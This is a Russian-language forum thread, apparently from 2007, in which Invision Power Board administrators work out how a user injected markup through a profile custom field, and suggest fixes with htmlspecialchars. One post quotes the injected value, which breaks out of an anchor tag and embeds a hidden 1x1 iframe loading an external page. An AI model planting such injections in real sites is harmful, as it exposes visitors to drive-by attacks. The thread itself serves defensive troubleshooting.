html в дополнительных полях разве разрешен?

[TOIIOP]

html в дополнительных полях разве разрешен? Каким-то образом пользователь выставил вместо текста картинку туда...

[Lopd_Nickon]

html в дополнительных полях разве разрешен? Каким-то образом пользователь выставил вместо текста картинку туда...

Помоему по дефолту нет, юзай настройки юзеров.

[TOIIOP]

хм.. вру.. не html разрешен, там както подругому выставили.... что это может быть?

[asoloviev]

Посмотреть профайл того кто выставил через менеджмент есть возможность?

 

Если имеет доступ к АЦП, вполне возможно, что просто методом проверки id пользователя и подстановки кода в соответствующий шаблон данных. Если нет - самому интересно. Наглядно можно лицезреть сие чудо?

Изменено 14 Августа 2007 пользователем _VIPER_

[TOIIOP]

Посмотреть профайл того кто выставил через менеджмент есть возможность?

Не совсем понял о чем речь..

 

Если имеет доступ к АЦП, вполне возможно, что просто методом проверки id пользователя и подстановки кода в соответствующий шаблон данных. Если нет - самому интересно. Наглядно можно лицезреть сие чудо?

 

К АЦП не имеет, к базам тоже, т.к. давно бы поломал там, а не правил свой профиль.. хз..

 

Код дополнительного поля такой:

<if="author['field_2'] != """>
<a href={$author['field_2']} target="_blank" title="Откроется в новом окне">Мое досье</a>
</if>

 

Вот сам юзер: Посмотреть

 

Дополнительное поле: Досье

При просмотре темы, там картинка, а при просмотре профиля, обрывок кода...

[asoloviev]

Однако. Изменено 14 Августа 2007 пользователем _VIPER_

[TOIIOP]

Ну так что? Есть решения исправить?

[Lopd_Nickon]

Ну так что? Есть решения исправить?

Код явно html, поюзай ац там в настройках юзеров запрети его.

[TOIIOP]

В настройках все нормально. Проверял на тестовом пользователе, нельзя было ему html использовать...

[TOIIOP]

Вообщем понял я в чем фишка...

Когда вставляют в поле код:

></a><iframe src=http://www.narod.ru/2.html width=1 height=1></iframe><body onload=

то закрываются как-то теги и почему то фрейм срабатывает...

Как сделать чтобы просто показывался текст при просмотре просмотре темы? При просмотре профиля, код не обрабатывается же...

[WildRAID]

Можно добавить функцию htmlspecialchars к обработке дополнительных полей профиля в topics.php. После неё всё будет отображаться корректно, но теги обрабатываться не будут.

 

Подробнее читать здесь:

 

http://www.softtime.ru/bookphp/gl3_2.php

 

Вообще, довольно странно, что это изначально не делается.

[TOIIOP]

А где в topics.php это прописывать?

[Song]

А версия точная?

[TOIIOP]

2.1.6

[Song]

Я слышал много нареканий про 6-ку.

На 2.1.7 никак что ли было не проапгрейдиться?

[TOIIOP]

Никак, т.к. в свое время было установлено много модов и с выходом 2.1.7 все переносить не очень то и хотелось... К тому же, были установлены все заплатки для 2.1.х. (хотя наверно не все, раз такая фигня с полями)

 

Как это исправить?

[Song]

К тому же, были установлены все заплатки для 2.1.х.

А где ты их все взял?

Ты думаешь что здесь это все?

Это только те что универсальны ко всем версиям, т.е. те, которые нашли. Те, что были в каких-то подбиладах даже никто и не знал никогда, т.к. эти подбилды были в использовании довольно немногочисленное время.

 

Как это исправить?

Не знаю.

Видимо брать кусок твоего форума и сравнивать с аналогичным куском 2.1.7

[TOIIOP]

Ну хз.. щас попробовал 2.1.7 установить, там такая же фигня...

[WildRAID]

В /sources/classes/class_custom_fields.php нашел функцию:

 

	/*-------------------------------------------------------------------------*/
// Make safe for other viewing (profile, etc)
/*-------------------------------------------------------------------------*/

function method_make_safe_for_view( $t )
{
	if ( $this->kill_html )
	{
		$t = htmlspecialchars( $t );
		$t = preg_replace("/&#([0-9]+);/s", "\\1;", $t );
	}

	return $t;
}

 

По идее, именно она и отвечает за то, чтобы не было такой ерунды.

 

На крайний случай можно попробовать в функцию:

 

	function method_format_content_for_save( $c )
{
	$c = str_replace( "\r"   , "\n", $c );
	$c = str_replace( "'", "'" , $c );
	return str_replace( "\n", '|', str_replace( "\n\n", "\n", trim($c) ) );
}

 

Добавить строку:

 

$c = htmlspecialchars($c);

 

В этом случае конвертировать оно будет уже при попытке сохранить информацию в дополнительное поле профиля. Делать на свой страх и риск.

 

+++

 

P.S. Мм, а посмотри, не разрешен ли html группе пользователей. Возможно, проблема в этом, и у тебя условие ( $this->kill_html ) возвращает false.

[TOIIOP]

WildRAID,

Что-то не получается... Всеравно проходит код.

 

P.S. Мм, а посмотри, не разрешен ли html группе пользователей. Возможно, проблема в этом, и у тебя условие ( $this->kill_html ) возвращает false.

Точно не разрешен.

[WildRAID]

Все это очень странно. Лично я бы поискал\купил нормальный релиз IPB, потому как с этим что-то неладное творится.

 

Ну не может быть такого, чтобы в доп. полях профиля не делался htmlspecialchars по умолчанию. Может там еще и яваскрипт вставить можно?

 

Видел в некоторых местах информацию о том, что существуют варезные релизы, которые специально "протрояненны" разными уязвимостями и шеллами. Кто знает, может это оно и есть...

[TOIIOP]

Да нет.. дело не в лицензионной верси.. просто там теги закрывают, и потом вставляют свой код... и он почему -то срабатывает... может быть я неправилньо сделал это дополнительное поле?